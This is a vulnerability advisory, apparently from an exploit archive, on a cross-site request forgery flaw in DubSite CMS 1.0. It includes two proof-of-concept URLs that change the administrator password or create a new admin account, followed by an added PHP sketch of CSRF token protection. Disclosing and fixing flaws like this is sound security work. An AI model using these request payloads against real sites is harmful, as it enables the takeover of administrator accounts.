DubSite CMS 1.0 Cross Site Request Forgery

Posted Dec 15, 2009
Authored by Connection

DubSite CMS version 1.0 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 37dfa00e0df1ed684660b0f815d142220760ab688b11387a59c89a1cff04496e

Pentest Information:
====================
Connection has discovered a Cross Site Request Forgery (CSRF) vulnerability in DubSite CMS v1.0.


Details
=======
Tested on OS: Windows XP
Tested with Software: Mozilla Firefox 3.5.x

Vulnerable Products: DubSite CMS
Affected Versions: 1.0
Vulnerability Type: Cross Site Request Forgery
Security-Risk: High

Vendor-URL: http://www.dubsite.net
Preview-URL: http://www.opensourcecms.com/demo/1/282/Dubsite

Vendor-Status: Not informed
Patch/Fix-Status: Fixed version not released
Advisory-Status: Written | 12/15/09

Advisory-URL:
Report-URL:


Introduction:
=============
Dubsite CMS is a minimalistic yet powerful approach to web content management. Dubsite is written in PHP, built upon the Zend Framework and published under the GNU General Public License. Its goal is to simplify effective management and handling of websites without being overbearing to non-technical users.

(Copied from the vendor's homepage: http://www.dubsite.net)

More Details:
=============
Due to multiple missing input validation checks, an attacker is able to change the password of the administrative user.

Proof of Concept:
=================
The following link will change the password of the administrative account. Changing the options will also allow you to change the name of the admin account:

http://server/dubsite/index.php/admin/users/accounts/edit/1?username=admin&userpassword=own3d&userpassword2=own3d&role_id=1&active=1&update=Update

This link creates a user "hax0r" with password test123 and adds it to the administrator group.

http://server/dubsite/index.php/admin/users/accounts?role_id=1&username=hax0r&userpassword=test123&userpassword2=test123&create=Create

Fix & Patch:
============
To fix the bugs, a token system is highly advised.
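
A minimal sketch of such a token system, added here as an illustration; it is not code from this advisory or from DubSite, and the function names and the csrf_token field name are hypothetical. It also rejects GET for account changes, since both proof-of-concept requests above are plain links.

```php
<?php
declare(strict_types=1);
// Added example, not DubSite code; function and field names are hypothetical.
// In a real app: $session is $_SESSION, $post is $_POST and $method is
// $_SERVER['REQUEST_METHOD']. Arrays are passed in so this runs from the CLI.

/** Create (once per session) and return the anti-CSRF token. */
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit random value
    }
    return $session['csrf_token'];
}

/** Hidden field to embed in every account create/edit form. */
function csrf_hidden_field(array &$session): string
{
    $token = htmlspecialchars(csrf_issue_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '">';
}

/** Allow a state-changing request only if it is a POST carrying the session's token. */
function csrf_request_allowed(string $method, array $post, array $session): bool
{
    if (strtoupper($method) !== 'POST') {
        return false; // account changes must never be triggered by a GET link
    }
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    if (!is_string($sent) || !is_string($expected) || $expected === '') {
        return false; // no token issued, or malformed input such as an array
    }
    return hash_equals($expected, $sent); // constant-time comparison
}

// Constructed requests against one logged-in admin session.
$session = [];
$token   = csrf_issue_token($session);
$form    = ['username' => 'editor', 'role_id' => '2'];
$cases   = [
    'cross-site GET link'       => ['GET',  $form],
    'cross-site POST, no token' => ['POST', $form],
    'cross-site POST, guessed'  => ['POST', $form + ['csrf_token' => str_repeat('0', 64)]],
    'genuine admin form POST'   => ['POST', $form + ['csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    printf("%-27s %s\n", $label, csrf_request_allowed($method, $post, $session) ? 'accepted' : 'rejected');
}
```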

Security Risk:
==============
An attacker is able to change the password of the administrative user, thus gaining complete control over the site. The risk is estimated as HIGH.

Author:
=======
The author and writer is part of the HackTalk Security Group.

~CONNECTION